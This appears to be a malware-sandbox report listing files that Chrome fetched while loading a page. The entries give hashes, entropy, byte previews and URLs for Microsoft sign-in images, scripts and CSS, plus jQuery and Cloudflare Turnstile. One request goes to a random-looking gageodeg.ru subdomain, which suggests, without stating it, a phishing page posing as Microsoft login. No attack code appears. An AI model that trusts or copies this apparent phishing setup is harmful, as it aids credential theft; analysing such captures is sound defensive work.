                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                            Category:downloaded
                                                            Size (bytes):17174
                                                            Entropy (8bit):2.9129715116732746
                                                            Encrypted:false
                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                            Category:downloaded
                                                            Size (bytes):122725
                                                            Entropy (8bit):7.997347629519925
                                                            Encrypted:true
                                                            SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                            MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                            SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                            SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                            SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                                            Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:downloaded
                                                            Size (bytes):89501
                                                            Entropy (8bit):5.289893677458563
                                                            Encrypted:false
                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                            Category:dropped
                                                            Size (bytes):122725
                                                            Entropy (8bit):7.997347629519925
                                                            Encrypted:true
                                                            SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                            MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                            SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                            SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                            SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:very short file (no magic)
                                                            Category:downloaded
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru/pFGLdePtgRbnQGWUVTchrlHEeVXVUPMZSHGJUQTEJVUQOSFRKRHTNPNQXLMUEVNZOGJKBVWSRPCMQZSYWK
                                                            Preview:1
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                            Category:downloaded
                                                            Size (bytes):673
                                                            Entropy (8bit):7.6596900876595075
                                                            Encrypted:false
                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:dropped
                                                            Size (bytes):2672
                                                            Entropy (8bit):6.640973516071413
                                                            Encrypted:false
                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:1
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                            Category:dropped
                                                            Size (bytes):49954
                                                            Entropy (8bit):7.99493321471063
                                                            Encrypted:true
                                                            SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                            MD5:E16AC075AC754DBD1CF969508220E30D
                                                            SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                            SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                            SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                            Category:downloaded
                                                            Size (bytes):20410
                                                            Entropy (8bit):7.980582012022051
                                                            Encrypted:false
                                                            SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                            MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                            SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                            SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                            SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                            Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:downloaded
                                                            Size (bytes):2672
                                                            Entropy (8bit):6.640973516071413
                                                            Encrypted:false
                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                            Category:dropped
                                                            Size (bytes):5525
                                                            Entropy (8bit):7.961202222662501
                                                            Encrypted:false
                                                            SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                            Category:downloaded
                                                            Size (bytes):35170
                                                            Entropy (8bit):7.993096534744333
                                                            Encrypted:true
                                                            SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (47520)
                                                            Category:downloaded
                                                            Size (bytes):47521
                                                            Entropy (8bit):5.3981340461317835
                                                            Encrypted:false
                                                            SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                            MD5:7C92EC9D1395055CE0405A32607C7291
                                                            SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                            SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                            SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                            Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                            Category:dropped
                                                            Size (bytes):673
                                                            Entropy (8bit):7.6596900876595075
                                                            Encrypted:false
                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
